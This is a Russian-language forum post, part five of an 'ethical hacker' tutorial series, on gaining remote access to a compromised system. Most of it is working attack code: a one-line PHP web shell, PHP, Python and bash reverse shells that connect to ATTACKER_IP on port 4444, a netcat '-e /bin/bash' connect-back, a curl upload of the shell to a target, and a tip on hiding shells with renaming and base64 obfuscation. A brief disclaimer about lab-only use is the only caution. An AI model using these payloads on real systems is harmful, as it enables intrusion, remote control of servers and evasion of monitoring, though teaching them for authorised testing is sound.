Путь этичного хакера – Часть [5] – Удалённый доступ и обратные подключения

HMCoba

Форумчанин
Регистрация
14.06.2025
Сообщения
20
Реакции
26
2ntes1t.png


🧠 Путь этичного хакера часть - 5
Удалённый доступ: подключение к скомпрометированной системе[/B]


📌 Оглавление серии:
Часть 1 — Введение в этичный хакинг
Часть 2 — Установка Kali Linux и создание тестовой среды
Часть 3 — Тестирование уязвимостей веб-приложений
Часть 4 — Продвинутые атаки и анализ окружения
Часть 5 — Удалённый доступ и обратные подключения
Часть 6 — Повышение привилегий, поиск SUID и cron-уязвимостей
Часть 7 — Автоматизация атак с помощью Python и работа с Metasploit




Если вы нашли уязвимость в веб-приложении или системе, следующим логичным шагом будет получение удалённого доступа. В этой части мы рассмотрим, как это реализуется на практике — от загрузки шеллов до обратных подключений.


🧩 Что такое удалённый доступ?

Удалённый доступ позволяет управлять системой, находящейся в другой сети, при этом взаимодействуя с ней через терминал. В пентесте это ключевой этап после эксплуатации.


📥 Получение доступа через Web Shell
Простой PHP Web Shell:
Код:
<?php system($_GET["cmd"]); ?>

Загрузка через уязвимость (например, LFI или RCE):
Код:
http://target.site/shell.php?cmd=whoami

— позволяет выполнять команды от имени веб-сервера (обычно
Код:
www-data
).


📡 Обратное подключение (reverse shell)
Reverse shell — когда целевая машина сама подключается к атакующему. Это позволяет обойти фаерволы и NAT.

Пример PHP Reverse Shell:
Код:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'");
?>


На атакующей машине (Kali Linux) запускаем listener:
Код:
nc -lvnp 4444


📌 После загрузки и выполнения шелла, вы получите обратное соединение с терминалом.

🛠 Альтернативные методы шеллов:
Python reverse shell:
Код:
python -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("ATTACKER_IP",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh"])'

bash shell:
Код:
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1


📦 Использование Netcat на целевой машине:
Если Netcat доступен:
Код:
nc ATTACKER_IP 4444 -e /bin/bash

Атакующий:
Код:
nc -lvnp 4444


🛡 Как замаскировать shell:
Вы можете изменить имя файла, расширение, использовать base64-обфускацию или внедрить код в существующий скрипт.

🔗 Проверка соединения:
На атакующей стороне:
Код:
ifconfig
netstat -antp

На целевой:
Код:
curl http://ATTACKER_IP/shell.php

📁 Пример загрузки shell через curl:
Код:
curl -F "file=@shell.php" http://target.site/upload.php

⚠️ Важно:
Обратное подключение может быть зафиксировано средствами мониторинга и журналирования. Всегда действуйте в рамках закона и только в тестовой среде.

📌 Заключение
В этом выпуске вы узнали:
  • Что такое удалённый доступ и зачем он нужен
  • Как получить доступ через Web Shell
  • Как настроить и использовать обратное подключение
  • Какие команды применяются для получения интерактивного доступа
  • Как использовать Netcat и другие инструменты

🔜 В следующей части мы рассмотрим:
  • Повышение привилегий
  • Поиск SUID и cron-уязвимостей
  • Использование linpeas

✉️ Делитесь в комментариях, удалось ли вам получить удалённый доступ, и какой метод сработал лучше всего![/SIZE]
 
Последнее редактирование:

Похожие темы

Назад
Верх Низ